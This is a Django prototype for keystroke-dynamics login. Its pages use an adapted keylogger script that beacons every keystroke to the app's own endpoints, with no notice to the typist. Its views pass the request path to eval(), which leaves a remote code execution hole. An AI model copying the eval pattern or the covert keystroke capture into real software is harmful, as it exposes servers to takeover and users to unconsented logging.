mysite/keys/urls.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.apps import AppConfig

from django.conf.urls import url

from . import views

urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^prof', views.prof, name = 'prof'),
    url(r'^listen', views.listen, name = 'listen'),
    url(r'^listn2', views.listn2, name = 'listn2'),
    url(r'test', views.test, name = 'test'),
    url(r'^result', views.result, name = 'result')
]

mysite/mysite/urls.py
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth import views as auth_views
from keys import views as key_views

from django.conf.urls import include

urlpatterns = [
    url(r'^keys/', include('keys.urls', namespace="keys")),
    url(r'^login/$', auth_views.login, name='login'),
    url(r'^logout/$', auth_views.logout, name='logout'),
    url(r'^admin/', admin.site.urls),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^signup/$', key_views.signup, name='signup'),
]

mysite/keys/models.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models

class Keys(models.Model):
    user = models.CharField(max_length=30)
    key_name = models.CharField(max_length=30)
    release = models.IntegerField(default = 0)
    timestamp = models.BigIntegerField(default =0)

mysite/keys/views.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.template import loader
from keys.models import Keys
from picardi import run
from django.contrib.auth import login, authenticate
from django.contrib.auth.forms import UserCreationForm

# Create your views here.



def index(request):
    latest_question_list = ''
    template = loader.get_template('index.html')
    context = {
        'latest_question_list': latest_question_list,
    }
    return HttpResponse(template.render(context, request))

def prof(request):
    profile_user = request.POST.get('uname')
    temp_keys = Keys.objects.filter(user = 'temp')
    for i in temp_keys:
        i.user = profile_user
        i.save()
    template = loader.get_template('prof.html')
    context = {
        'You have submitted your profile':'1'
    }
    return HttpResponse(template.render(context, request))

def listen(request):
    username = 'temp'
    if request.user.is_authenticated():
        username = request.user.username
    request = eval(request.path.split('n/')[-1])

    for e in request:
        b = Keys(user = username, key_name=e['k'], release = e['r'], timestamp = e['t'])
        b.save()
    if request:
        pass
     #print >>file, request

     #file.close()
    return HttpResponse(request)

def listn2(request):
    request = eval(request.path.split('n2/')[-1])
    file = open('data.txt', 'a')
    all_keys = Keys.objects.filter(user = 'jiaju')

    for e in request:

        print >>file, '%s\t%s\t%s' %( e['t'], e['k'],  e['r'])

    print request

    file.close()
    return HttpResponse(request)

def test(request):
    template = loader.get_template('test.html')
    context = {
        'You have submitted your profile':'1'
    }
    return HttpResponse(template.render(context, request))

def result(request):

    attempt_user = request.POST.get('uname')
    all_keys = Keys.objects.filter(user = attempt_user)
    if not all_keys: return HttpResponse('The user name does not exist')
    #r = '\t'.join([str([ i.timestamp, i.key_name, i.release]) for i in all_keys])
    r = sorted([( i.timestamp, i.key_name, i.release) for i in all_keys if i.release==0])
    #r = ', '.join(str(i) for i in r)
    r= run(r)
    #r = '\t'.join([i[1] for i in r if i[2] == 0])
    #r = '\t'.join([i.key_name for i in all_keys if i.release == 0])
    #r = 'You are supposed to get your test result here'
    open('data.txt', 'w')
    if r<=0.4: return HttpResponse('Welcome back, %s. Your distance score is %s<br><a href = "/keys/test">Back to test page</a><br><a href = "/keys/"> Back to Enrollment </a>'%(attempt_user, r))
    #elif r<= 0.45: return HttpResponse('I am not convinced that you are %s, please type some more keys. Your distance score is %s <br><a href = "/keys/test">Back to test page</a><br><a href = "/keys/"> Back to Enrollment </a>'%(attempt_user, r))
    else: return HttpResponse('Your distance score is %s<br><a href = "/keys/test">Back to test page</a><br><a href = "/keys/"> Back to Enrollment </a>'%(  r))

def signup(request):
    if request.method == 'POST':
        form = UserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            raw_password = form.cleaned_data.get('password1')
            user = authenticate(username=username, password=raw_password)
            login(request, user)
            return redirect('index')
    else:
        form = UserCreationForm()
    return render(request, 'signup.html', {'form': form})

mysite/keys/templates/base.html
{% load static %}<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <title>{% block title %}Default Title{% endblock %}</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/app.css' %}">
    {% block stylesheet %}{% endblock %}
  </head>
  <body>
    <header>
      ...
    </header>
    <main>
      {% block content %}
      {% endblock %}
    </main>
    <footer>
      ...
    </footer>
    <script src="https://code.jquery.com/jquery-3.1.0.min.js"></script>
    <script src="{% static 'js/app.js' %}"></script>
    {% block javascript %}{% endblock %}
  </body>
</html>

mysite/keys/templates/index.html
<html>
<head>
  <title></title>
</head>
<body>

<script src="logger.js"></script>
<script>var buffer = [];
var attacker = 'http://127.0.0.1:8000/keys/listen/'

document.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 0
    };
    //alert('press'+e.key);
     document.getElementById("demo").innerHTML = 'press '+e.key+timestamp;
    buffer.push(stroke);
}

document.onkeyup = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 1
    };
    //alert('release'+e.key);
    document.getElementById("demo").innerHTML = 'release '+e.key + timestamp;
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
    	//alert(buffer.join());
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);</script>

<p id="demo"></p>
<font size = "20">Keystroke Enrollment </font>
<br>
please fill in the form
<form action="{% url 'keys:prof'  %}" method="post">
{% csrf_token %}

    User ID: <input type="text" name="uname"><br>
	Text:<textarea rows="10" cols = "100" name = "profile"></textarea><br>
<input type="submit" value="submit" />
</form>
<a href = keys/test> test page </a>
</body>
</html>

mysite/keys/templates/prof.html
Your keystrokes has been added to the profile
<br>
<a href = "/keys/test"> Proceed to test </a><br>
<a href = "/keys/"> Back to Enrollment </a>

mysite/keys/templates/signup.html
{% extends 'base.html' %}

{% block content %}
  <h2>Sign up</h2>
  <form method="post">
    {% csrf_token %}
    {{ form.as_p }}
    <button type="submit">Sign up</button>
  </form>
{% endblock %}

mysite/keys/templates/test.html
<html>
<head>
  <title></title>
</head>
<body>

<script>var buffer = [];
var attacker = '/keys/listn2/'

document.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 0
    };
    //alert('press'+e.key);
     document.getElementById("demo").innerHTML = 'press '+e.key+timestamp;
    buffer.push(stroke);
}

document.onkeyup = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp,
        r: 1
    };
    //alert('release'+e.key);
    document.getElementById("demo").innerHTML = 'release '+e.key + timestamp;
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
    	//alert(buffer.join());
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);</script>

<p id="demo"></p>
<font size = "20">Keystroke Test</font> <br/>
please fill in the form
<form action="{% url 'keys:result'  %}" method="post">
{% csrf_token %}

    User ID: <input type="text" name="uname"><br>
	Text:<textarea  style="font-size:16px" rows="8" cols = "90" name = "profile"></textarea><br>
<input type="submit" value="submit" />
</form>

</body>
</html>